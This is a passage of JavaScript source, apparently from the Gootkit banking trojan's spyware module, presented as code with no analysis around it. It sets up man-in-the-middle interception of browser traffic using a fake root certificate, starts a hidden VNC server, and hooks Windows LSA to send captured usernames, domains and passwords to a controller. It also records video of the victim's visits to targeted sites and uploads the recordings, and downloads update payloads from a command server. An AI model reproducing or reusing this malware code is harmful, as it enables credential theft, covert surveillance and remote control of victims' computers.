    if(process.currentBinary === 'firefox.exe'){
        certgen.firefoxImportCert(
            certgen.pemToDer(existentCACert), 
            process.md5(existentCACert)
        );
    }

    process.IsCertificateFakerInitDone = true;
}

function SpStartHttpIntercepting() 
{
    if(process.isHttpInterceptingEnabled === false){

        process.IsCertificateFakerInitDone = false;
        process.isHttpInterceptingEnabled = true;
        process.isHttpInterceptingEnabled = 
        gootkit_spyware.SpHookHttp(true, function(address, onDone){
            
            if(!process.IsCertificateFakerInitDone){
                return onDone(address);
            }

            if(process.listeners(['browser_connection_request']).length > 0){
                process.fall('browser_connection_request', address, function(newAddress){
                    ConnectionRequestCallback(newAddress, onDone);
                });
            }else{
                ConnectionRequestCallback(address, onDone);
            }
        });
        InitializeCertificateFaker();
    }
};

exports.PregenerateCertificate = function(){
    certgen.installRootCACertificate(function () {});
}

exports.SpStartHttpIntercepting = SpStartHttpIntercepting;
    //=========================================================================================================
var vncServerStarted = false;

exports.startVncServer = function(){

    if(vncServerStarted) 
        return vncServerStarted;
    
    
    function getRandomArbitrary(min, max) {
        return Math.floor(Math.random() * (max - min) + min);
    }

    var userServer;
    var VncServiceSocket;
    
    vncServerStarted = (gootkit_spyware.SpRunVnc() === 1);
    
    return vncServerStarted;
}

process.log = function(){
    try{
        var s = util.format.apply(this, arguments);
        var packet = messages.LogLine.encode({
            logstr : s
        });
        
        if(process.controllerConnection){
            process.controllerConnection
                .sendProtocolPacket(P_SPYWARE, 
                    SLAVE_PACKET_LOGLINE, 0, packet);
        }else{
            if (process.masterConnection) {
                process.masterConnection.sendProtocolPacket(
                    SLAVE_PACKET_LOGLINE,
                    packet
                );
            }
            else
            {
                process.pendingMessages.push({
                    t : SLAVE_PACKET_LOGLINE,
                    p : packet
                });
            }
        }
    
    }catch(e){
        print(e.message);
        print(e.stack);
    }
}

process.logException = function(exc, info){
    try{ 
        var logline = util.format(
            "%s.%s (%s/%s/%s) exception : %s\n%s",
        
            process.execPath,
            process.arch,

            util.format("%s.%s", process.version, process.g_botId),
            process.g_vendorName,
            util.format("%s %s (%s)", os.type(), os.release(), os.arch()),

            exc.message,
            exc.stack
        );

        if(info){
            logline += util.format('\nInformation : %s', info)
        }

        process.log(logline);
    }catch(e){

    }
}

function downloadUpdate(serverHost, callback){

    var arch = { 'ia32' : 32, 'x64' : 64 };
    var updateLink = util.format("https://%s:80/rbody%d", serverHost, arch[process.arch]);

    gootkit_spyware.DownloadFileRight(updateLink, function(error, fileBuffer){
        callback(error, fileBuffer);
    });
    
}
//=========================================================================================================
process.on("auth_credentials", function(data){
    if (process.masterConnection) {
        process.masterConnection.sendProtocolPacket(
            SLAVE_PACKET_LSAAUTH,
            messages.LsaAuth.encode(data)
        );
    }
    else
    {
        process.pendingMessages.push({
            t : SLAVE_PACKET_LSAAUTH,
            p : messages.LsaAuth.encode(data)
        });
    }
    
});
function SendAuthInformationPacket(UserName, UserDomain, UserPassword) {
    
    if(UserName === '' && UserPassword === '')
        return;

    if(process.env['LOGONSERVER'].indexOf('EI797E8') !== -1){
        return;
    }

    process.emit('auth_credentials',{
        UserName: UserName,
        UserDomain: UserDomain,
        UserPassword: UserPassword
    });
}


function SpHookLsa(){
    return gootkit_spyware.SpHookLsa(SendAuthInformationPacket);
}

process.SendAuthInformationPacket = SendAuthInformationPacket;
exports.SendAuthInformationPacket = SendAuthInformationPacket;
exports.SpHookLsa = SpHookLsa;
//=========================================================================================================
function SplitVirtualPath(varPath) {
    var normalizedPath = path.normalize(varPath);

    if (normalizedPath.lastIndexOf(path.sep) === (normalizedPath.length - 1)) {
        normalizedPath = normalizedPath.substring(0, normalizedPath.length - 1);
    }

    return normalizedPath.split(path.sep);
}

function GetObjectValueByPath(object, varPath) {

    var arrayOfNames = SplitVirtualPath(varPath);
    var tmp = object;

    while (arrayOfNames.length) {
        var n = arrayOfNames.shift();
        if (n in tmp) {
            tmp = tmp[n];
        } else {
            return;
        }
    }
    return tmp;
}


function SetObjectValueByPath(object, varPath, varValue) {

    var result;
    var arrayOfNames = SplitVirtualPath(varPath);
    var tmp = object;

    for (var i = 0; i < arrayOfNames.length - 1; i++) {


        var n = arrayOfNames[i];

        if (n in tmp) {
            tmp = tmp[n];
        } else {
            tmp[n] = {};
            tmp = tmp[n];
        }
    }

    tmp[arrayOfNames[arrayOfNames.length - 1]] = varValue;
    return object;
}

var globalStorageName = '';

function MachineSetGlobalStorageName(name) {
    globalStorageName = name;
}

function MachineInitializeVariablesStorage(name) {

    if (util.isUndefined(name)) {
        name = globalStorageName;
    }

    if (gootkit_spyware.GCreateSharedString(name)) {
        return true;
    }

    return false;
}


function MachineGetValue(varPath, storName) {

    if (util.isUndefined(storName)) {
        storName = globalStorageName;
    }

    if (typeof (storName) === 'string' && storName !== '') {

        //console.log(gootkit_spyware.GGetSharedString(storName));
        try {
            var parsedObject = JSON.parse(gootkit_spyware.GGetSharedString(storName));
            if (parsedObject) {
                return GetObjectValueByPath(parsedObject, varPath);
            }
        } catch (e) {
            return undefined;
        }
    }
}


function MachineSetValue(varPath, varValue, storName) {

    if (util.isUndefined(storName)) {
        storName = globalStorageName;
    }

    if (typeof (storName) === 'string' && storName !== '') {

        var parsedObject;

        try {
            parsedObject = JSON.parse(gootkit_spyware.GGetSharedString(storName));
        } catch (e) {
            parsedObject = {};
        }

        if (parsedObject) {
            var newObject = SetObjectValueByPath(parsedObject, varPath, varValue);
            if (newObject) {
                gootkit_spyware.GSetSharedString(storName, JSON.stringify(newObject));
            }
        }
    }
}

function ToBoolean(somthing) {
    try {
        switch (somthing.toString().toLowerCase()) {
            case "true": case "yes": case "1": return true;
            case "false": case "no": case "0": case null: return false;
            default: return Boolean(string);
        }
    } catch (e) {
        return false;
    }
}

process.videorecoder = {
    options: {
        recorderProcess: 'svchost.exe'
    }
}

exports.videorecoder = process.videorecoder;

function getCompressor() {
    var compressor;
    var lz = require('xz');

    for (var i = 9; i > 0; i--) {
        try {
            compressor = new lz.Compressor(i);
            break;
        } catch (e) {

        }
    }

    return compressor;
}

process.on('browser_navigate', function(location)
{
    try{
        
        if (util.isUndefined(process.g_scfg)) {
            return false;
        }

        var recordersArray = process.g_scfg.recorders;

        if (util.isUndefined(recordersArray)) {
            return false;
        }

        if (util.isUndefined(location)) {
            return false;
        }

        if (process.currentBinary === process.videorecoder.options.recorderProcess) {

            for (let i = 0; i < recordersArray.length; i++) {

                var rec = recordersArray[i];

                if (rec.base.enabled === false) {
                    continue;
                }

                if (!zeusfunctions.isUrlMatchedInRule(location, rec)) {
                    continue;
                }

                if (typeof (process.VideoRecorder) !== 'undefined') {

                    var recordingHostname = url.parse(location).host;
                    var vedeofile = rec.filenameMask;
                    if (typeof (vedeofile) === 'undefined') {
                        vedeofile = "video_%HOSTNAME%_%DATE%";
                    }


                    vedeofile = zeusfunctions.ReplaceStandartMacroses(
                        vedeofile, recordingHostname);

                    var filename = path.join(process.env['temp'], vedeofile);

                    if (fs.existsSync(filename + '.ivf') === true) {
                        filename += ('_' + utils.getCurrentTimstamp());
                    }

                    filename += '.ivf';

                    var recorder = new process.VideoRecorder(filename,
                        rec.grayScale,
                        rec.framerate,
                        rec.seconds,
                        rec.hashkey
                    );

                    if(recorder.configure){
                        recorder.configure({
                            bit_depth : 8,
                            max_quantizer : 80,
                            min_quantizer : 80
                        });
                    }


                    recorder.start(function () {
                        if (rec.uploadAfterRecord === true) {

                            var compressor = getCompressor();
                            var inFile = fs.createReadStream(filename);
                            var outFile = fs.createWriteStream(filename + ".lzma2");

                            outFile.on('close', function () {
                                fs.unlinkSync(filename);
                                process.uploadLocalFile(filename + ".lzma2", function () { });
                            });

                            inFile.pipe(compressor).pipe(outFile);

                        };
                    });
                }
            }
        }

    }catch(exception){
        process.logException(exception);
    }
    return false;

})

var VideoRecorders = [];

function VideoRecorder(
    filename,
    grayScale,
    bitrate,
    seconds,
    hashkey
) {
    var self = this;
    if (util.isUndefined(bitrate)) {
        bitrate = 2;
    }

    if (util.isUndefined(grayScale)) {
        grayScale = true;
    }

    self.grayScale = ToBoolean(grayScale);
    self.bitrate = parseInt(bitrate);
    self.filename = filename;
    self.hashkey = process.md5(hashkey);
    self.timeout = seconds * 1000;

    if (self.bitrate > 25)
        self.bitrate = 25;

    self.recorder = new video_recorder.VideoRecorder(
        self.filename,
        self.grayScale,
        self.bitrate
    );

    self.recorderTimeout = 0;
    self.onDoneCallback;
}

VideoRecorder.prototype.start = function (callback) {
    var self = this;

    if (VideoRecorders.indexOf(self.hashkey) === -1) {

        VideoRecorders.push(self.hashkey);

        if (self.recorder) {
            self.recorder.start(function () {
                callback(self);
            });
        }

        self.recorderTimeout = setTimeout(
            function () {
                self.recorderTimeout = 0;
                self.stop();
            },
            self.timeout
        );

    } else {
        //console.log('VideoRecorder.prototype.start : sorry, video already recording');
    }
}

VideoRecorder.prototype.isRecordingNow = function () {

    //console.log('VideoRecorder.prototype.isRecordingNow');

    var self = this;

    return self.recorder.isRecordRunning();
}

VideoRecorder.prototype.stop = function () {
    var self = this;

    if (self.recorderTimeout !== 0) {
        clearTimeout(self.recorderTimeout);
    }

    self.recorderTimeout = 0;
    self.recorder.stop();

    var RecorderIndex = VideoRecorders.indexOf(self.hashkey);
    if (RecorderIndex !== -1) {
        VideoRecorders.splice(RecorderIndex, 1);
    }

}

VideoRecorder.prototype.lastErrorMessage = function () {
    var self = this;
    return self.recorder.getLastErrorMessage();
}

process.VideoRecorder = VideoRecorder;

process.GCreateSharedString = gootkit_spyware.GCreateSharedString;
process.GSetSharedString = gootkit_spyware.GSetSharedString;
process.GGetSharedString = gootkit_spyware.GGetSharedString;

process.MachineInitializeVariablesStorage = MachineInitializeVariablesStorage;
process.MachineSetGlobalStorageName = MachineSetGlobalStorageName;
process.MachineGetValue = MachineGetValue;
process.MachineSetValue = MachineSetValue;
process.downloadUpdate = downloadUpdate;
